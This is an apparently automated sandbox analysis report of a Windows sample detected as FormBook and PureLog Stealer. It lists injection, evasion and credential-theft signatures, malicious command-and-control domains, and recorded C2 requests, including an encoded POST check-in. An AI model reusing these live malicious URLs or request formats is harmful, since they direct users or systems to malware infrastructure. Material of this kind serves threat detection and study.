Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1435891
MD5: b3316732270c9df8d45c5b7ead0f4064
SHA1: 21fe2d77413a09d783e0151f0b16ccce430ca28f
SHA256: c040726eab61fc794f91f7d7712de11b4955c76db950e3b85ef57d413b15eb87
Tags: exe

Detection

FormBook, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

Source: http://www.linbreoffice.org/qruc/ Avira URL Cloud: Label: malware
Source: http://www.klingerlumberltd.com/qruc/?K0J=ebDTRVV8VZr&oB1d=4y8JdVmVqWeea5bUJhnZt7XNxRE24icx9gyDCHl5L7QB29ig52mkDYCfyusGnjDf+1nAg1jN2XuDrRbFj9LrT3fa2hcokdL8Q9MgXuVmgdyCbuMpnnH80A0= Avira URL Cloud: Label: malware
Source: http://www.linbreoffice.org/qruc/?K0J=ebDTRVV8VZr&oB1d=Xmo1lInOanbZEZR2FfqxILRU2WQsGTgTYIBV9i+RFmbCb5D19+w35N1Is2bkZ42QIXmVJTObgj0BeJUqj9w3UH0zQRfJBsE/jQutHm2oMvc1KqjOm02x0DQ= Avira URL Cloud: Label: malware
Source: file.exe ReversingLabs: Detection: 47%
Source: Yara match File source: 4.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.2844593434.00000000018C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2843507028.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3513763448.0000000000850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3513480286.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3513697990.0000000000810000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3514140722.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3514995651.0000000002F10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2851724313.0000000001DF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: file.exe Joe Sandbox ML: detected
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: unlodctr.pdbGCTL source: file.exe, 00000004.00000002.2844123064.0000000001477000.00000004.00000020.00020000.00000000.sdmp, LHmmkoXQgKLVlTwFJILFF.exe, 00000007.00000002.3514082611.0000000001178000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: LHmmkoXQgKLVlTwFJILFF.exe, 00000007.00000000.2734692610.000000000080E000.00000002.00000001.01000000.0000000C.sdmp, LHmmkoXQgKLVlTwFJILFF.exe, 00000009.00000000.2915078639.000000000080E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP source: file.exe, 00000004.00000002.2845166430.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, 00000008.00000003.2847038817.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 00000008.00000002.3515125802.0000000003010000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, 00000008.00000003.2843356794.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 00000008.00000002.3515125802.00000000031AE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: file.exe, file.exe, 00000004.00000002.2845166430.00000000019A0000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, unlodctr.exe, 00000008.00000003.2847038817.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 00000008.00000002.3515125802.0000000003010000.00000040.00001000.00020000.00000000.sdmp, unlodctr.exe, 00000008.00000003.2843356794.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 00000008.00000002.3515125802.00000000031AE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: unlodctr.pdb source: file.exe, 00000004.00000002.2844123064.0000000001477000.00000004.00000020.00020000.00000000.sdmp, LHmmkoXQgKLVlTwFJILFF.exe, 00000007.00000002.3514082611.0000000001178000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_0036B7C0 FindFirstFileW,FindNextFileW,FindClose, 8_2_0036B7C0
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then jmp 070D9EA4h 0_2_070D937B
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then jmp 070D9EA4h 0_2_070D96F8
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 4x nop then xor eax, eax 8_2_00359470

Networking

Source: Traffic Snort IDS: 2856318 ETPRO TROJAN FormBook CnC Checkin (POST) M4 192.168.2.12:49729 -> 109.123.121.243:80
Source: DNS query: www.quantumboulevard.xyz
Source: Joe Sandbox View IP Address: 64.225.91.73
Source: Joe Sandbox View IP Address: 66.29.135.159
Source: Joe Sandbox View IP Address: 109.70.148.57
Source: Joe Sandbox View ASN Name: ADVANTAGECOMUS
Source: Joe Sandbox View ASN Name: UK2NET-ASGB
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /qruc/?K0J=ebDTRVV8VZr&oB1d=4y8JdVmVqWeea5bUJhnZt7XNxRE24icx9gyDCHl5L7QB29ig52mkDYCfyusGnjDf+1nAg1jN2XuDrRbFj9LrT3fa2hcokdL8Q9MgXuVmgdyCbuMpnnH80A0= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usHost: www.klingerlumberltd.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /qruc/?oB1d=UAq9CzGRql0qbxLGxVHqg5bf0CZ8rOmIoC7W/FPBEpHWNGr0R1xACLnBcwEc3ZkTuU45ULwzGu2M7+E0XrmRMVrUBL+8Gy/k2I5T6z62CfhcpnnIk8mA5gg=&K0J=ebDTRVV8VZr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usHost: www.gattosat.icuConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /qruc/?K0J=ebDTRVV8VZr&oB1d=Xmo1lInOanbZEZR2FfqxILRU2WQsGTgTYIBV9i+RFmbCb5D19+w35N1Is2bkZ42QIXmVJTObgj0BeJUqj9w3UH0zQRfJBsE/jQutHm2oMvc1KqjOm02x0DQ= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usHost: www.linbreoffice.orgConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Source: global traffic HTTP traffic detected: GET /qruc/?oB1d=TKQjCngekOUXb4wXltIPy/Q8yQpui0ExkVDYFHPguHHgtawi326eHXwL5/LbdhSUHl1rH91YHPKtuSAwSH4DtV2YStFMFWvJ0j7VceHyQH2xgQtUsq8+akA=&K0J=ebDTRVV8VZr HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usHost: www.quantumboulevard.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Source: global traffic DNS traffic detected: DNS query: www.klingerlumberltd.com
Source: global traffic DNS traffic detected: DNS query: www.gattosat.icu
Source: global traffic DNS traffic detected: DNS query: www.linbreoffice.org
Source: global traffic DNS traffic detected: DNS query: www.quantumboulevard.xyz
Source: unknown HTTP traffic detected: POST /qruc/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usHost: www.gattosat.icuConnection: closeContent-Length: 201Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0Origin: http://www.gattosat.icuReferer: http://www.gattosat.icu/qruc/User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko Data Ascii: oB1d=ZCCdBE+xg1BOFR/KyH72yLHS4y0wpo2slDjF2haaLtbnJ1KgTw9nGOKZcSEMmIJInGUIK4tUc4Od6PJtZeHjAy3xBem9P3DYgZtl6C3CF81moXzJkrfz8yhJpI06W7ntgvhDwN/r7A/vCAPoiv0xUVkh/5B2nowZnnzhL7/ay3c4mU6x/mvoJaZsj7so8TJBtA==
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Fri, 03 May 2024 09:25:12 GMTserver: LiteSpeed
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 03 May 2024 09:25:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 03 May 2024 09:25:30 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 03 May 2024 09:25:33 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 03 May 2024 09:25:35 GMTContent-Type: text/htmlContent-Length: 146Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 09:25:55 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 09:25:58 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 09:26:01 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 03 May 2024 09:26:03 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: file.exe String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: file.exe String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: file.exe String found in binary or memory: http://ocsp.comodoca.com0
Source: unlodctr.exe, 00000008.00000002.3515982994.0000000003A24000.00000004.10000000.00040000.00000000.sdmp, LHmmkoXQgKLVlTwFJILFF.exe, 00000009.00000002.3515215930.0000000002F54000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.3138320391.000000002A324000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.litespeedtech.com/error-page
Source: LHmmkoXQgKLVlTwFJILFF.exe, 00000009.00000002.3514140722.0000000000C63000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.quantumboulevard.xyz
Source: LHmmkoXQgKLVlTwFJILFF.exe, 00000009.00000002.3514140722.0000000000C63000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.quantumboulevard.xyz/qruc/
Source: unlodctr.exe, 00000008.00000002.3518324593.00000000076C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: unlodctr.exe, 00000008.00000002.3518324593.00000000076C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: unlodctr.exe, 00000008.00000002.3518324593.00000000076C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: unlodctr.exe, 00000008.00000002.3518324593.00000000076C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: unlodctr.exe, 00000008.00000002.3517962083.0000000005B90000.00000004.00000800.00020000.00000000.sdmp, unlodctr.exe, 00000008.00000002.3515982994.0000000003D48000.00000004.10000000.00040000.00000000.sdmp, LHmmkoXQgKLVlTwFJILFF.exe, 00000009.00000002.3515215930.0000000003278000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://domaincntrol.com/?orighost=
Source: unlodctr.exe, 00000008.00000002.3518324593.00000000076C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: unlodctr.exe, 00000008.00000002.3518324593.00000000076C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: unlodctr.exe, 00000008.00000002.3518324593.00000000076C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: unlodctr.exe, 00000008.00000002.3513851473.00000000008C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: unlodctr.exe, 00000008.00000002.3513851473.00000000008C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: unlodctr.exe, 00000008.00000002.3513851473.00000000008C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
Source: unlodctr.exe, 00000008.00000002.3513851473.00000000008C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2:
Source: unlodctr.exe, 00000008.00000002.3513851473.00000000008C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: unlodctr.exe, 00000008.00000002.3513851473.00000000008C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: unlodctr.exe, 00000008.00000002.3513851473.00000000008C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: unlodctr.exe, 00000008.00000002.3513851473.00000000008C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: unlodctr.exe, 00000008.00000003.3031185324.00000000075F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: unlodctr.exe, 00000008.00000002.3517962083.0000000005B90000.00000004.00000800.00020000.00000000.sdmp, unlodctr.exe, 00000008.00000002.3515982994.0000000003D48000.00000004.10000000.00040000.00000000.sdmp, LHmmkoXQgKLVlTwFJILFF.exe, 00000009.00000002.3515215930.0000000003278000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://nojs.domaincntrol.com
Source: file.exe String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: unlodctr.exe, 00000008.00000002.3518324593.00000000076C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/

E-Banking Fraud

Source: Yara match File source: 4.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.2844593434.00000000018C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2843507028.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3513763448.0000000000850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3513480286.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3513697990.0000000000810000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3514140722.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3514995651.0000000002F10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2851724313.0000000001DF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 4.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 4.2.file.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.2844593434.00000000018C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.2843507028.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.3513763448.0000000000850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.3513480286.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.3513697990.0000000000810000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.3514140722.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.3514995651.0000000002F10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.2851724313.0000000001DF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_0042AE33 NtClose, 4_2_0042AE33
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12B60 NtClose,LdrInitializeThunk, 4_2_01A12B60
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12DF0 NtQuerySystemInformation,LdrInitializeThunk, 4_2_01A12DF0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12C70 NtFreeVirtualMemory,LdrInitializeThunk, 4_2_01A12C70
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A135C0 NtCreateMutant,LdrInitializeThunk, 4_2_01A135C0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A14340 NtSetContextThread, 4_2_01A14340
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A14650 NtSuspendThread, 4_2_01A14650
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12BA0 NtEnumerateValueKey, 4_2_01A12BA0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12B80 NtQueryInformationFile, 4_2_01A12B80
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12BE0 NtQueryValueKey, 4_2_01A12BE0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12BF0 NtAllocateVirtualMemory, 4_2_01A12BF0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12AB0 NtWaitForSingleObject, 4_2_01A12AB0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12AF0 NtWriteFile, 4_2_01A12AF0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12AD0 NtReadFile, 4_2_01A12AD0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12DB0 NtEnumerateKey, 4_2_01A12DB0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12DD0 NtDelayExecution, 4_2_01A12DD0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12D30 NtUnmapViewOfSection, 4_2_01A12D30
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12D00 NtSetInformationFile, 4_2_01A12D00
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12D10 NtMapViewOfSection, 4_2_01A12D10
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12CA0 NtQueryInformationToken, 4_2_01A12CA0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12CF0 NtOpenProcess, 4_2_01A12CF0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12CC0 NtQueryVirtualMemory, 4_2_01A12CC0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12C00 NtQueryInformationProcess, 4_2_01A12C00
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12C60 NtCreateKey, 4_2_01A12C60
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12FA0 NtQuerySection, 4_2_01A12FA0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12FB0 NtResumeThread, 4_2_01A12FB0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12F90 NtProtectVirtualMemory, 4_2_01A12F90
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12FE0 NtCreateFile, 4_2_01A12FE0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12F30 NtCreateSection, 4_2_01A12F30
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12F60 NtCreateProcessEx, 4_2_01A12F60
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12EA0 NtAdjustPrivilegesToken, 4_2_01A12EA0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12E80 NtReadVirtualMemory, 4_2_01A12E80
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12EE0 NtQueueApcThread, 4_2_01A12EE0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A12E30 NtWriteVirtualMemory, 4_2_01A12E30
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A13090 NtSetValueKey, 4_2_01A13090
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A13010 NtOpenDirectoryObject, 4_2_01A13010
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A139B0 NtGetContextThread, 4_2_01A139B0
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A13D10 NtOpenProcessToken, 4_2_01A13D10
Source: C:\Users\user\Desktop\file.exe Code function: 4_2_01A13D70 NtOpenThread, 4_2_01A13D70
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03084340 NtSetContextThread,LdrInitializeThunk, 8_2_03084340
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03084650 NtSuspendThread,LdrInitializeThunk, 8_2_03084650
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082B60 NtClose,LdrInitializeThunk, 8_2_03082B60
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082BA0 NtEnumerateValueKey,LdrInitializeThunk, 8_2_03082BA0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082BE0 NtQueryValueKey,LdrInitializeThunk, 8_2_03082BE0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 8_2_03082BF0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082AD0 NtReadFile,LdrInitializeThunk, 8_2_03082AD0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082AF0 NtWriteFile,LdrInitializeThunk, 8_2_03082AF0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082F30 NtCreateSection,LdrInitializeThunk, 8_2_03082F30
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082FB0 NtResumeThread,LdrInitializeThunk, 8_2_03082FB0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082FE0 NtCreateFile,LdrInitializeThunk, 8_2_03082FE0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082E80 NtReadVirtualMemory,LdrInitializeThunk, 8_2_03082E80
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082EE0 NtQueueApcThread,LdrInitializeThunk, 8_2_03082EE0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082D10 NtMapViewOfSection,LdrInitializeThunk, 8_2_03082D10
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082D30 NtUnmapViewOfSection,LdrInitializeThunk, 8_2_03082D30
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082DD0 NtDelayExecution,LdrInitializeThunk, 8_2_03082DD0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082DF0 NtQuerySystemInformation,LdrInitializeThunk, 8_2_03082DF0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082C60 NtCreateKey,LdrInitializeThunk, 8_2_03082C60
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082C70 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_03082C70
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082CA0 NtQueryInformationToken,LdrInitializeThunk, 8_2_03082CA0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030835C0 NtCreateMutant,LdrInitializeThunk, 8_2_030835C0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_030839B0 NtGetContextThread,LdrInitializeThunk, 8_2_030839B0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082B80 NtQueryInformationFile, 8_2_03082B80
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082AB0 NtWaitForSingleObject, 8_2_03082AB0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082F60 NtCreateProcessEx, 8_2_03082F60
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 8_2_03082F90 NtProtectVirtualMemory, 8_2_03082F90
